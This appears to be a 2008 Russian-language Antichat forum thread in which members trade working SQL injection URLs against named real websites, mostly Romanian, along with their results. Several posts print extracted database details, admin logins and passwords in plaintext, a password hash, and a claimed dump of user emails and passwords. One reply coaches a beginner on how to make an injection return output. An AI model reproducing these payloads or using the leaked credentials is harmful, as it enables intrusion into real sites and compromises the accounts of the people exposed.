Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.06.2008, 20:56
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427
Репутация:
187
|
|
Код:
http://www.1class.aero/strana.php?id=-230+union+select+1,2,login,4,email,6,7,8,9,user(),11,12,13,14,15+from+1class_admin--
имя колонки с паролем не подобрал :-/
Pr=5, CMS=koobi
Код:
http://www.sequa.de/index.php?categ=-1+union+select+1,2,3/*&parent=0&p=downloads&area=1
Не смог подобрать имя таблицы, вот и выложил на паблик.(P.S. обычно kpro_user kpro6_user kpro5_user и т.д.)
Последний раз редактировалось Dr.Frank; 17.06.2008 в 21:08..
|
|
|
17.06.2008, 22:39
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
.ro
Времени нету почти, поэтому не все докрутил. Где блок стоит на вывод или на union сами разберетесь, кому надо )
Не везет что-то сегодня - все мускулы 4ые 
PR - 3
http://www.dapnl-pd.ro/docpage.php?id=24+order+by+1/*
PR - 4
http://www.ieas.ro/noutatii.php?id=-83+union+select+concat_ws(0x3a,user(),version(),da tabase())/*
whieas@localhost:4.1.20-log:whieas
PR - 4
http://www.finearts.ro/lucrare.php?id=-185+Union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, user(),version(),database()),11,12,13,14,15,16/*
finearts_ro@localhost:4.1.22-standard:finearts_ro
PR - 4
http://www.narcisvirgiliu.ro/detail.php?id=-10+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4/*
narcis@localhost:4.1.22-standard-log:narcis_nv
Код:
1:narcis:12uiligriv21
Админ.
www.narcisvirgiliu.ro/admin/ - Админка.
PR - 4
http://www.atdr.ro/index.php?id=-274+union+select+1,2,3,4,5,6,7,8,9,10,11/*
PR - 4
http://www.prefecturatimis.ro/comunicate_articol.php?id=-1544+union+select+1,2,3,4,5,6/*
PR - 5
http://www.bcucluj.ro/english/detalii.php?id=-17832+union+select+1,2,3,4,5,6,7/*
PR - 5
http://proiecte.nipne.ro/pn2/index_en.php?id=-14+union+select+concat_ws(0x3a,user(),version(),da tabase())/*
conusr@localhost:4.1.20 ncdi2
Admin.pass - 556eba5e26cdd0e1
PR - 5
http://www.apd.ro/publicatie.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
PR - 5
http://www.primet.ro/capital_sector.php?ID=-36+union+select+concat_ws(0x3a,user(),version(),da tabase()),2,3/*
PRIMET@LOCALHOST:5.0.44:PRIMET
Без дефейсов пожалуйста )
|
|
|
|
17.06.2008, 22:45
|
|
Новичок
Регистрация: 30.03.2008
Сообщений: 19
Провел на форуме:
95226
Репутация:
10
|
|
http://parovoz.com/thisday/comment.php?ID=29'
http://www.cyclonaire.com/accessoriesresults.cfm?ID=29'
http://dscripts.awardspace.com/scripts.php?id=29+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13/*
Раскрутить нету времени,так что извеняйте...
З.Ы.спасибо за внимание.
|
|
|
|
18.06.2008, 05:05
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
#urbaner
http://parovoz.com/thisday/comment.php?ID=29'+union+select+unhex(hex(concat_w s(0x3a,login,password,email))),2+from+gallery.auth ors+where+id=1+limit+1,1/*
http://parovoz.com/thisday/comment.php?ID=29'+union+select+unhex(hex(concat_w s(0x3a,id,name,password))),2+from+gallery.rrr1+lim it+1,1/*
хек.
Последний раз редактировалось sabe; 18.06.2008 в 05:18..
|
|
|
|
18.06.2008, 18:33
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257
Репутация:
627
|
|
Вот смог развить инъекцию, налетай))
Код:
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,concat(name,%20char(58),name2,char(58),name3,char(58),passw,char(58),police,char(58),birthday,char(58),email,0x3C62723E)+FROM+author_tbl+limit+0,1000/*
Мыла, логины, пароли, вся пачка.
Вот имена таблиц:
Код:
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,TABLE_NAME+FROM%20INFORMATION_SCHEMA.TABLES+limit+1,30/*
Колонки в author_tbl
Код:
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x617574686F725F74626C+limit+0,20/*
PS Если что не так, не бейте сильно, я изучаю SQLINJ всего лишь четвертый день((
Последний раз редактировалось Лайт; 18.06.2008 в 19:06..
|
|
|
|
18.06.2008, 22:02
|
|
Новичок
Регистрация: 30.03.2008
Сообщений: 19
Провел на форуме:
95226
Репутация:
10
|
|
http://www.kino.ru/cinema.php?id=10+union+select+1,2,3,4,5,6,7/*
Блин,не могу найти поля для вывода
P.S.Блин а де она,(1) в упор не вижу..
Последний раз редактировалось #urbaner; 18.06.2008 в 22:17..
|
|
|
|
18.06.2008, 22:13
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
#urbaner
{1},2,3,4,5,6
4.1.22-standard-log
u6635_1
u6635_1@localhost
|
|
|
|
18.06.2008, 22:26
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
#urbaner нужно переходит к несуществующим значениям параметра
http://www.kino.ru/cinema.php?id=-10+union+select+1,2,3,4,5,6,7/*
http://www.kino.ru/cinema.php?id=99999999999999+union+select+1,2,3,4, 5,6,7/*
или так
http://www.kino.ru/cinema.php?id=10+and+10=0+union+select+1,2,3,4,5,6 ,7/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
19.06.2008, 00:13
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+INFORMATION_SCHEMA.columns/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+INFORMATION_SCHEMA.SCHEMATA/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+INFORMATION_SCHEMA.tables/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+mysql.user/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+dual/*
[OK] http://meet.similarminds.com/index.php?sid=comments&GET_id=-20+UNION+SELECT
+1,2,3,4+FROM+phpbb_users/*
|
|
|
|
19.06.2008, 12:27
|
|
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920
Репутация:
369
|
|
Хотел было заказать себе домик в Голландии через это агентство, ну да ладно. =)
http://www.pandzoeker.nl/-housingonline/
Код:
http://www.pandzoeker.nl/-housingonline/view.php?id=15050+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58),username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80+from+users/*
Ник: otto
Пароль: victor1
Последний раз редактировалось ЛифчиС5СВ; 19.06.2008 в 12:30..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
